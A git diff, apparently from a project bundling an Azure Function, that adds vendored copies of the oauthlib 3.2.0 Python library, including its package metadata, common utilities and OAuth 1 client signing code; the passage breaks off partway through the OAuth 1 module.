+oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/pre_configured.py,sha256=p4Bq4HHUTvCBYXlTHr3PXktABKjHFGC3yBmwxWifzKc,5426 +oauthlib/openid/connect/core/endpoints/userinfo.py,sha256=gTO5BHp4evBqI9CcQKQzJNFs1rx8QJLlBtfo7S67s0I,3847 +oauthlib/openid/connect/core/exceptions.py,sha256=uMMjE7VMc16jyL7TIhpbCx48_MsHD2C_atoMIemBKVA,4790 +oauthlib/openid/connect/core/grant_types/__init__.py,sha256=geSZh6OFlupoC2tg9Bqqsnd31nu1-EheWNobzu86ZqU,426 +oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc,, +oauthlib/openid/connect/core/grant_types/authorization_code.py,sha256=WOlS5RlSjIk2VNNmC5O4svxfTeUJiXpL3o5Mqn5EULk,1441 +oauthlib/openid/connect/core/grant_types/base.py,sha256=StMSoCD-lrv-01GZMLKdLMvTlAg-VkQ0lw4jdhVOEms,15386 +oauthlib/openid/connect/core/grant_types/dispatchers.py,sha256=kgYI3SpTZd796N_bnkqdaTDis_WmwhzkcMS9Avw_1zM,3979 +oauthlib/openid/connect/core/grant_types/hybrid.py,sha256=PHWBazxe3qpJq02rpU93jaK7URxI_r1zl0Ee4ibcaPA,2742 +oauthlib/openid/connect/core/grant_types/implicit.py,sha256=UICxnDNoePZfTUbL5QCBWA231o8XIQEnxocSrPp9gzw,1971 +oauthlib/openid/connect/core/grant_types/refresh_token.py,sha256=8X0i1EHLgBIrlqP10rwJ5lXWO3f8iupmfn2E6DlLmnw,1035 +oauthlib/openid/connect/core/request_validator.py,sha256=-lo1BnAhMWVkCj2Qhpn22LbV6CDmx4Nh4tCOntCg9tQ,13767 +oauthlib/openid/connect/core/tokens.py,sha256=uiHwpFiVhaQDFdKizV74AcBPuEiHxZQ9mtZ8n5KfvFU,1596 +oauthlib/signals.py,sha256=_PKDXWqKW6X3IbQUxGqW4eJ5Yi3p8jdOqXPAKfI956E,1489 +oauthlib/uri_validate.py,sha256=XLEO1mSoXK5j9kYA12JxnTktWhsJH40mPJ9m8q7jDYw,6107 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt new file mode 100644 index 0000000..14c0294 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/top_level.txt @@ -0,0 +1 @@ +oauthlib diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py new file mode 100644 index 0000000..2982ba0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__init__.py @@ -0,0 +1,34 @@ +""" + oauthlib + ~~~~~~~~ + + A generic, spec-compliant, thorough implementation of the OAuth + request-signing logic. + + :copyright: (c) 2019 by The OAuthlib Community + :license: BSD, see LICENSE for details. +""" +import logging +from logging import NullHandler + +__author__ = 'The OAuthlib Community' +__version__ = '3.2.0' + +logging.getLogger('oauthlib').addHandler(NullHandler()) + +_DEBUG = False + +def set_debug(debug_val): + """Set value of debug flag + + :param debug_val: Value to set. Must be a bool value. + """ + global _DEBUG + _DEBUG = debug_val + +def get_debug(): + """Get debug mode value. + + :return: `True` if debug mode is on, `False` otherwise + """ + return _DEBUG diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b495b30 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc new file mode 100644 index 0000000..3bb8b8d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/common.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc new file mode 100644 index 0000000..8df25b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/signals.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc new file mode 100644 index 0000000..bcaeb7b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/__pycache__/uri_validate.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py new file mode 100644 index 0000000..013f4ad --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/common.py @@ -0,0 +1,434 @@ +""" +oauthlib.common +~~~~~~~~~~~~~~ + +This module provides data structures and utilities common +to all implementations of OAuth. +""" +import collections +import datetime +import logging +import re +import time +import urllib.parse as urlparse +from urllib.parse import ( + quote as _quote, unquote as _unquote, urlencode as _urlencode, +) + +from . import get_debug + +try: + from secrets import randbits + from secrets import SystemRandom +except ImportError: + from random import getrandbits as randbits + from random import SystemRandom + +UNICODE_ASCII_CHARACTER_SET = ('abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789') + +CLIENT_ID_CHARACTER_SET = (r' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMN' + 'OPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}') + +SANITIZE_PATTERN = re.compile(r'([^&;]*(?:password|token)[^=]*=)[^&;]+', re.IGNORECASE) +INVALID_HEX_PATTERN = re.compile(r'%[^0-9A-Fa-f]|%[0-9A-Fa-f][^0-9A-Fa-f]') + +always_safe = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789' '_.-') + +log = logging.getLogger('oauthlib') + + +# 'safe' must be bytes (Python 2.6 requires bytes, other versions allow either) +def quote(s, safe=b'/'): + s = s.encode('utf-8') if isinstance(s, str) else s + s = _quote(s, safe) + # PY3 always returns unicode. PY2 may return either, depending on whether + # it had to modify the string. + if isinstance(s, bytes): + s = s.decode('utf-8') + return s + + +def unquote(s): + s = _unquote(s) + # PY3 always returns unicode. PY2 seems to always return what you give it, + # which differs from quote's behavior. Just to be safe, make sure it is + # unicode before we return. + if isinstance(s, bytes): + s = s.decode('utf-8') + return s + + +def urlencode(params): + utf8_params = encode_params_utf8(params) + urlencoded = _urlencode(utf8_params) + if isinstance(urlencoded, str): + return urlencoded + else: + return urlencoded.decode("utf-8") + + +def encode_params_utf8(params): + """Ensures that all parameters in a list of 2-element tuples are encoded to + bytestrings using UTF-8 + """ + encoded = [] + for k, v in params: + encoded.append(( + k.encode('utf-8') if isinstance(k, str) else k, + v.encode('utf-8') if isinstance(v, str) else v)) + return encoded + + +def decode_params_utf8(params): + """Ensures that all parameters in a list of 2-element tuples are decoded to + unicode using UTF-8. + """ + decoded = [] + for k, v in params: + decoded.append(( + k.decode('utf-8') if isinstance(k, bytes) else k, + v.decode('utf-8') if isinstance(v, bytes) else v)) + return decoded + + +urlencoded = set(always_safe) | set('=&;:%+~,*@!()/?\'$') + + +def urldecode(query): + """Decode a query string in x-www-form-urlencoded format into a sequence + of two-element tuples. + + Unlike urlparse.parse_qsl(..., strict_parsing=True) urldecode will enforce + correct formatting of the query string by validation. If validation fails + a ValueError will be raised. urllib.parse_qsl will only raise errors if + any of name-value pairs omits the equals sign. + """ + # Check if query contains invalid characters + if query and not set(query) <= urlencoded: + error = ("Error trying to decode a non urlencoded string. " + "Found invalid characters: %s " + "in the string: '%s'. " + "Please ensure the request/response body is " + "x-www-form-urlencoded.") + raise ValueError(error % (set(query) - urlencoded, query)) + + # Check for correctly hex encoded values using a regular expression + # All encoded values begin with % followed by two hex characters + # correct = %00, %A0, %0A, %FF + # invalid = %G0, %5H, %PO + if INVALID_HEX_PATTERN.search(query): + raise ValueError('Invalid hex encoding in query string.') + + # We want to allow queries such as "c2" whereas urlparse.parse_qsl + # with the strict_parsing flag will not. + params = urlparse.parse_qsl(query, keep_blank_values=True) + + # unicode all the things + return decode_params_utf8(params) + + +def extract_params(raw): + """Extract parameters and return them as a list of 2-tuples. + + Will successfully extract parameters from urlencoded query strings, + dicts, or lists of 2-tuples. Empty strings/dicts/lists will return an + empty list of parameters. Any other input will result in a return + value of None. + """ + if isinstance(raw, (bytes, str)): + try: + params = urldecode(raw) + except ValueError: + params = None + elif hasattr(raw, '__iter__'): + try: + dict(raw) + except ValueError: + params = None + except TypeError: + params = None + else: + params = list(raw.items() if isinstance(raw, dict) else raw) + params = decode_params_utf8(params) + else: + params = None + + return params + + +def generate_nonce(): + """Generate pseudorandom nonce that is unlikely to repeat. + + Per `section 3.3`_ of the OAuth 1 RFC 5849 spec. + Per `section 3.2.1`_ of the MAC Access Authentication spec. + + A random 64-bit number is appended to the epoch timestamp for both + randomness and to decrease the likelihood of collisions. + + .. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1 + .. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3 + """ + return str(str(randbits(64)) + generate_timestamp()) + + +def generate_timestamp(): + """Get seconds since epoch (UTC). + + Per `section 3.3`_ of the OAuth 1 RFC 5849 spec. + Per `section 3.2.1`_ of the MAC Access Authentication spec. + + .. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1 + .. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3 + """ + return str(int(time.time())) + + +def generate_token(length=30, chars=UNICODE_ASCII_CHARACTER_SET): + """Generates a non-guessable OAuth token + + OAuth (1 and 2) does not specify the format of tokens except that they + should be strings of random characters. Tokens should not be guessable + and entropy when generating the random characters is important. Which is + why SystemRandom is used instead of the default random.choice method. + """ + rand = SystemRandom() + return ''.join(rand.choice(chars) for x in range(length)) + + +def generate_signed_token(private_pem, request): + import jwt + + now = datetime.datetime.utcnow() + + claims = { + 'scope': request.scope, + 'exp': now + datetime.timedelta(seconds=request.expires_in) + } + + claims.update(request.claims) + + token = jwt.encode(claims, private_pem, 'RS256') + token = to_unicode(token, "UTF-8") + + return token + + +def verify_signed_token(public_pem, token): + import jwt + + return jwt.decode(token, public_pem, algorithms=['RS256']) + + +def generate_client_id(length=30, chars=CLIENT_ID_CHARACTER_SET): + """Generates an OAuth client_id + + OAuth 2 specify the format of client_id in + https://tools.ietf.org/html/rfc6749#appendix-A. + """ + return generate_token(length, chars) + + +def add_params_to_qs(query, params): + """Extend a query with a list of two-tuples.""" + if isinstance(params, dict): + params = params.items() + queryparams = urlparse.parse_qsl(query, keep_blank_values=True) + queryparams.extend(params) + return urlencode(queryparams) + + +def add_params_to_uri(uri, params, fragment=False): + """Add a list of two-tuples to the uri query components.""" + sch, net, path, par, query, fra = urlparse.urlparse(uri) + if fragment: + fra = add_params_to_qs(fra, params) + else: + query = add_params_to_qs(query, params) + return urlparse.urlunparse((sch, net, path, par, query, fra)) + + +def safe_string_equals(a, b): + """ Near-constant time string comparison. + + Used in order to avoid timing attacks on sensitive information such + as secret keys during request verification (`rootLabs`_). + + .. _`rootLabs`: http://rdist.root.org/2010/01/07/timing-independent-array-comparison/ + + """ + if len(a) != len(b): + return False + + result = 0 + for x, y in zip(a, b): + result |= ord(x) ^ ord(y) + return result == 0 + + +def to_unicode(data, encoding='UTF-8'): + """Convert a number of different types of objects to unicode.""" + if isinstance(data, str): + return data + + if isinstance(data, bytes): + return str(data, encoding=encoding) + + if hasattr(data, '__iter__'): + try: + dict(data) + except TypeError: + pass + except ValueError: + # Assume it's a one dimensional data structure + return (to_unicode(i, encoding) for i in data) + else: + # We support 2.6 which lacks dict comprehensions + if hasattr(data, 'items'): + data = data.items() + return {to_unicode(k, encoding): to_unicode(v, encoding) for k, v in data} + + return data + + +class CaseInsensitiveDict(dict): + + """Basic case insensitive dict with strings only keys.""" + + proxy = {} + + def __init__(self, data): + self.proxy = {k.lower(): k for k in data} + for k in data: + self[k] = data[k] + + def __contains__(self, k): + return k.lower() in self.proxy + + def __delitem__(self, k): + key = self.proxy[k.lower()] + super().__delitem__(key) + del self.proxy[k.lower()] + + def __getitem__(self, k): + key = self.proxy[k.lower()] + return super().__getitem__(key) + + def get(self, k, default=None): + return self[k] if k in self else default + + def __setitem__(self, k, v): + super().__setitem__(k, v) + self.proxy[k.lower()] = k + + def update(self, *args, **kwargs): + super().update(*args, **kwargs) + for k in dict(*args, **kwargs): + self.proxy[k.lower()] = k + + +class Request: + + """A malleable representation of a signable HTTP request. + + Body argument may contain any data, but parameters will only be decoded if + they are one of: + + * urlencoded query string + * dict + * list of 2-tuples + + Anything else will be treated as raw body data to be passed through + unmolested. + """ + + def __init__(self, uri, http_method='GET', body=None, headers=None, + encoding='utf-8'): + # Convert to unicode using encoding if given, else assume unicode + encode = lambda x: to_unicode(x, encoding) if encoding else x + + self.uri = encode(uri) + self.http_method = encode(http_method) + self.headers = CaseInsensitiveDict(encode(headers or {})) + self.body = encode(body) + self.decoded_body = extract_params(self.body) + self.oauth_params = [] + self.validator_log = {} + + self._params = { + "access_token": None, + "client": None, + "client_id": None, + "client_secret": None, + "code": None, + "code_challenge": None, + "code_challenge_method": None, + "code_verifier": None, + "extra_credentials": None, + "grant_type": None, + "redirect_uri": None, + "refresh_token": None, + "request_token": None, + "response_type": None, + "scope": None, + "scopes": None, + "state": None, + "token": None, + "user": None, + "token_type_hint": None, + + # OpenID Connect + "response_mode": None, + "nonce": None, + "display": None, + "prompt": None, + "claims": None, + "max_age": None, + "ui_locales": None, + "id_token_hint": None, + "login_hint": None, + "acr_values": None + } + self._params.update(dict(urldecode(self.uri_query))) + self._params.update(dict(self.decoded_body or [])) + + def __getattr__(self, name): + if name in self._params: + return self._params[name] + else: + raise AttributeError(name) + + def __repr__(self): + if not get_debug(): + return "" + body = self.body + headers = self.headers.copy() + if body: + body = SANITIZE_PATTERN.sub('\1', str(body)) + if 'Authorization' in headers: + headers['Authorization'] = '' + return ''.format( + self.uri, self.http_method, headers, body) + + @property + def uri_query(self): + return urlparse.urlparse(self.uri).query + + @property + def uri_query_params(self): + if not self.uri_query: + return [] + return urlparse.parse_qsl(self.uri_query, keep_blank_values=True, + strict_parsing=True) + + @property + def duplicate_params(self): + seen_keys = collections.defaultdict(int) + all_keys = (p[0] + for p in (self.decoded_body or []) + self.uri_query_params) + for k in all_keys: + seen_keys[k] += 1 + return [k for k, c in seen_keys.items() if c > 1] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py new file mode 100644 index 0000000..4944771 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__init__.py @@ -0,0 +1,28 @@ +""" +oauthlib.oauth1 +~~~~~~~~~~~~~~ + +This module is a wrapper for the most recent implementation of OAuth 1.0 Client +and Server classes. +""" +from .rfc5849 import Client +from .rfc5849 import (SIGNATURE_HMAC, + SIGNATURE_HMAC_SHA1, + SIGNATURE_HMAC_SHA256, + SIGNATURE_HMAC_SHA512, + SIGNATURE_RSA, + SIGNATURE_RSA_SHA1, + SIGNATURE_RSA_SHA256, + SIGNATURE_RSA_SHA512, + SIGNATURE_PLAINTEXT) +from .rfc5849 import SIGNATURE_TYPE_AUTH_HEADER, SIGNATURE_TYPE_QUERY +from .rfc5849 import SIGNATURE_TYPE_BODY +from .rfc5849.request_validator import RequestValidator +from .rfc5849.endpoints import RequestTokenEndpoint, AuthorizationEndpoint +from .rfc5849.endpoints import AccessTokenEndpoint, ResourceEndpoint +from .rfc5849.endpoints import SignatureOnlyEndpoint, WebApplicationServer +from .rfc5849.errors import (InsecureTransportError, + InvalidClientError, + InvalidRequestError, + InvalidSignatureMethodError, + OAuth1Error) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d15a3e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py new file mode 100644 index 0000000..c123f54 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py @@ -0,0 +1,365 @@ +""" +oauthlib.oauth1.rfc5849 +~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for signing and checking OAuth 1.0 RFC 5849 requests. + +It supports all three standard signature methods defined in RFC 5849: + +- HMAC-SHA1 +- RSA-SHA1 +- PLAINTEXT + +It also supports signature methods that are not defined in RFC 5849. These are +based on the standard ones but replace SHA-1 with the more secure SHA-256: + +- HMAC-SHA256 +- RSA-SHA256 + +""" +import base64 +import hashlib +import logging +import urllib.parse as urlparse + +from oauthlib.common import ( + Request, generate_nonce, generate_timestamp, to_unicode, urlencode, +) + +from . import parameters, signature + +log = logging.getLogger(__name__) + +# Available signature methods +# +# Note: SIGNATURE_HMAC and SIGNATURE_RSA are kept for backward compatibility +# with previous versions of this library, when it the only HMAC-based and +# RSA-based signature methods were HMAC-SHA1 and RSA-SHA1. But now that it +# supports other hashing algorithms besides SHA1, explicitly identifying which +# hashing algorithm is being used is recommended. +# +# Note: if additional values are defined here, don't forget to update the +# imports in "../__init__.py" so they are available outside this module. + +SIGNATURE_HMAC_SHA1 = "HMAC-SHA1" +SIGNATURE_HMAC_SHA256 = "HMAC-SHA256" +SIGNATURE_HMAC_SHA512 = "HMAC-SHA512" +SIGNATURE_HMAC = SIGNATURE_HMAC_SHA1 # deprecated variable for HMAC-SHA1 + +SIGNATURE_RSA_SHA1 = "RSA-SHA1" +SIGNATURE_RSA_SHA256 = "RSA-SHA256" +SIGNATURE_RSA_SHA512 = "RSA-SHA512" +SIGNATURE_RSA = SIGNATURE_RSA_SHA1 # deprecated variable for RSA-SHA1 + +SIGNATURE_PLAINTEXT = "PLAINTEXT" + +SIGNATURE_METHODS = ( + SIGNATURE_HMAC_SHA1, + SIGNATURE_HMAC_SHA256, + SIGNATURE_HMAC_SHA512, + SIGNATURE_RSA_SHA1, + SIGNATURE_RSA_SHA256, + SIGNATURE_RSA_SHA512, + SIGNATURE_PLAINTEXT +) + +SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER' +SIGNATURE_TYPE_QUERY = 'QUERY' +SIGNATURE_TYPE_BODY = 'BODY' + +CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded' + + +class Client: + + """A client used to sign OAuth 1.0 RFC 5849 requests.""" + SIGNATURE_METHODS = { + SIGNATURE_HMAC_SHA1: signature.sign_hmac_sha1_with_client, + SIGNATURE_HMAC_SHA256: signature.sign_hmac_sha256_with_client, + SIGNATURE_HMAC_SHA512: signature.sign_hmac_sha512_with_client, + SIGNATURE_RSA_SHA1: signature.sign_rsa_sha1_with_client, + SIGNATURE_RSA_SHA256: signature.sign_rsa_sha256_with_client, + SIGNATURE_RSA_SHA512: signature.sign_rsa_sha512_with_client, + SIGNATURE_PLAINTEXT: signature.sign_plaintext_with_client + } + + @classmethod + def register_signature_method(cls, method_name, method_callback): + cls.SIGNATURE_METHODS[method_name] = method_callback + + def __init__(self, client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC_SHA1, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, verifier=None, realm=None, + encoding='utf-8', decoding=None, + nonce=None, timestamp=None): + """Create an OAuth 1 client. + + :param client_key: Client key (consumer key), mandatory. + :param resource_owner_key: Resource owner key (oauth token). + :param resource_owner_secret: Resource owner secret (oauth token secret). + :param callback_uri: Callback used when obtaining request token. + :param signature_method: SIGNATURE_HMAC, SIGNATURE_RSA or SIGNATURE_PLAINTEXT. + :param signature_type: SIGNATURE_TYPE_AUTH_HEADER (default), + SIGNATURE_TYPE_QUERY or SIGNATURE_TYPE_BODY + depending on where you want to embed the oauth + credentials. + :param rsa_key: RSA key used with SIGNATURE_RSA. + :param verifier: Verifier used when obtaining an access token. + :param realm: Realm (scope) to which access is being requested. + :param encoding: If you provide non-unicode input you may use this + to have oauthlib automatically convert. + :param decoding: If you wish that the returned uri, headers and body + from sign be encoded back from unicode, then set + decoding to your preferred encoding, i.e. utf-8. + :param nonce: Use this nonce instead of generating one. (Mainly for testing) + :param timestamp: Use this timestamp instead of using current. (Mainly for testing) + """ + # Convert to unicode using encoding if given, else assume unicode + encode = lambda x: to_unicode(x, encoding) if encoding else x + + self.client_key = encode(client_key) + self.client_secret = encode(client_secret) + self.resource_owner_key = encode(resource_owner_key) + self.resource_owner_secret = encode(resource_owner_secret) + self.signature_method = encode(signature_method) + self.signature_type = encode(signature_type) + self.callback_uri = encode(callback_uri) + self.rsa_key = encode(rsa_key) + self.verifier = encode(verifier) + self.realm = encode(realm) + self.encoding = encode(encoding) + self.decoding = encode(decoding) + self.nonce = encode(nonce) + self.timestamp = encode(timestamp) + + def __repr__(self): + attrs = vars(self).copy() + attrs['client_secret'] = '****' if attrs['client_secret'] else None + attrs['rsa_key'] = '****' if attrs['rsa_key'] else None + attrs[ + 'resource_owner_secret'] = '****' if attrs['resource_owner_secret'] else None + attribute_str = ', '.join('{}={}'.format(k, v) for k, v in attrs.items()) + return '<{} {}>'.format(self.__class__.__name__, attribute_str) + + def get_oauth_signature(self, request): + """Get an OAuth signature to be used in signing a request + + To satisfy `section 3.4.1.2`_ item 2, if the request argument's + headers dict attribute contains a Host item, its value will + replace any netloc part of the request argument's uri attribute + value. + + .. _`section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + """ + if self.signature_method == SIGNATURE_PLAINTEXT: + # fast-path + return signature.sign_plaintext(self.client_secret, + self.resource_owner_secret) + + uri, headers, body = self._render(request) + + collected_params = signature.collect_parameters( + uri_query=urlparse.urlparse(uri).query, + body=body, + headers=headers) + log.debug("Collected params: {}".format(collected_params)) + + normalized_params = signature.normalize_parameters(collected_params) + normalized_uri = signature.base_string_uri(uri, headers.get('Host', None)) + log.debug("Normalized params: {}".format(normalized_params)) + log.debug("Normalized URI: {}".format(normalized_uri)) + + base_string = signature.signature_base_string(request.http_method, + normalized_uri, normalized_params) + + log.debug("Signing: signature base string: {}".format(base_string)) + + if self.signature_method not in self.SIGNATURE_METHODS: + raise ValueError('Invalid signature method.') + + sig = self.SIGNATURE_METHODS[self.signature_method](base_string, self) + + log.debug("Signature: {}".format(sig)) + return sig + + def get_oauth_params(self, request): + """Get the basic OAuth parameters to be used in generating a signature. + """ + nonce = (generate_nonce() + if self.nonce is None else self.nonce) + timestamp = (generate_timestamp() + if self.timestamp is None else self.timestamp) + params = [ + ('oauth_nonce', nonce), + ('oauth_timestamp', timestamp), + ('oauth_version', '1.0'), + ('oauth_signature_method', self.signature_method), + ('oauth_consumer_key', self.client_key), + ] + if self.resource_owner_key: + params.append(('oauth_token', self.resource_owner_key)) + if self.callback_uri: + params.append(('oauth_callback', self.callback_uri)) + if self.verifier: + params.append(('oauth_verifier', self.verifier)) + + # providing body hash for requests other than x-www-form-urlencoded + # as described in https://tools.ietf.org/html/draft-eaton-oauth-bodyhash-00#section-4.1.1 + # 4.1.1. When to include the body hash + # * [...] MUST NOT include an oauth_body_hash parameter on requests with form-encoded request bodies + # * [...] SHOULD include the oauth_body_hash parameter on all other requests. + # Note that SHA-1 is vulnerable. The spec acknowledges that in https://tools.ietf.org/html/draft-eaton-oauth-bodyhash-00#section-6.2 + # At this time, no further effort has been made to replace SHA-1 for the OAuth Request Body Hash extension. + content_type = request.headers.get('Content-Type', None) + content_type_eligible = content_type and content_type.find('application/x-www-form-urlencoded') < 0 + if request.body is not None and content_type_eligible: + params.append(('oauth_body_hash', base64.b64encode(hashlib.sha1(request.body.encode('utf-8')).digest()).decode('utf-8'))) + + return params + + def _render(self, request, formencode=False, realm=None): + """Render a signed request according to signature type + + Returns a 3-tuple containing the request URI, headers, and body. + + If the formencode argument is True and the body contains parameters, it + is escaped and returned as a valid formencoded string. + """ + # TODO what if there are body params on a header-type auth? + # TODO what if there are query params on a body-type auth? + + uri, headers, body = request.uri, request.headers, request.body + + # TODO: right now these prepare_* methods are very narrow in scope--they + # only affect their little thing. In some cases (for example, with + # header auth) it might be advantageous to allow these methods to touch + # other parts of the request, like the headers—so the prepare_headers + # method could also set the Content-Type header to x-www-form-urlencoded + # like the spec requires. This would be a fundamental change though, and + # I'm not sure how I feel about it. + if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER: + headers = parameters.prepare_headers( + request.oauth_params, request.headers, realm=realm) + elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None: + body = parameters.prepare_form_encoded_body( + request.oauth_params, request.decoded_body) + if formencode: + body = urlencode(body) + headers['Content-Type'] = 'application/x-www-form-urlencoded' + elif self.signature_type == SIGNATURE_TYPE_QUERY: + uri = parameters.prepare_request_uri_query( + request.oauth_params, request.uri) + else: + raise ValueError('Unknown signature type specified.') + + return uri, headers, body + + def sign(self, uri, http_method='GET', body=None, headers=None, realm=None): + """Sign a request + + Signs an HTTP request with the specified parts. + + Returns a 3-tuple of the signed request's URI, headers, and body. + Note that http_method is not returned as it is unaffected by the OAuth + signing process. Also worth noting is that duplicate parameters + will be included in the signature, regardless of where they are + specified (query, body). + + The body argument may be a dict, a list of 2-tuples, or a formencoded + string. The Content-Type header must be 'application/x-www-form-urlencoded' + if it is present. + + If the body argument is not one of the above, it will be returned + verbatim as it is unaffected by the OAuth signing process. Attempting to + sign a request with non-formencoded data using the OAuth body signature + type is invalid and will raise an exception. + + If the body does contain parameters, it will be returned as a properly- + formatted formencoded string. + + Body may not be included if the http_method is either GET or HEAD as + this changes the semantic meaning of the request. + + All string data MUST be unicode or be encoded with the same encoding + scheme supplied to the Client constructor, default utf-8. This includes + strings inside body dicts, for example. + """ + # normalize request data + request = Request(uri, http_method, body, headers, + encoding=self.encoding) + + # sanity check + content_type = request.headers.get('Content-Type', None) + multipart = content_type and content_type.startswith('multipart/') + should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED + has_params = request.decoded_body is not None + # 3.4.1.3.1. Parameter Sources + # [Parameters are collected from the HTTP request entity-body, but only + # if [...]: + # * The entity-body is single-part. + if multipart and has_params: + raise ValueError( + "Headers indicate a multipart body but body contains parameters.") + # * The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # [W3C.REC-html40-19980424]. + elif should_have_params and not has_params: + raise ValueError( + "Headers indicate a formencoded body but body was not decodable.") + # * The HTTP request entity-header includes the "Content-Type" + # header field set to "application/x-www-form-urlencoded". + elif not should_have_params and has_params: + raise ValueError( + "Body contains parameters but Content-Type header was {} " + "instead of {}".format(content_type or "not set", + CONTENT_TYPE_FORM_URLENCODED)) + + # 3.5.2. Form-Encoded Body + # Protocol parameters can be transmitted in the HTTP request entity- + # body, but only if the following REQUIRED conditions are met: + # o The entity-body is single-part. + # o The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # [W3C.REC-html40-19980424]. + # o The HTTP request entity-header includes the "Content-Type" header + # field set to "application/x-www-form-urlencoded". + elif self.signature_type == SIGNATURE_TYPE_BODY and not ( + should_have_params and has_params and not multipart): + raise ValueError( + 'Body 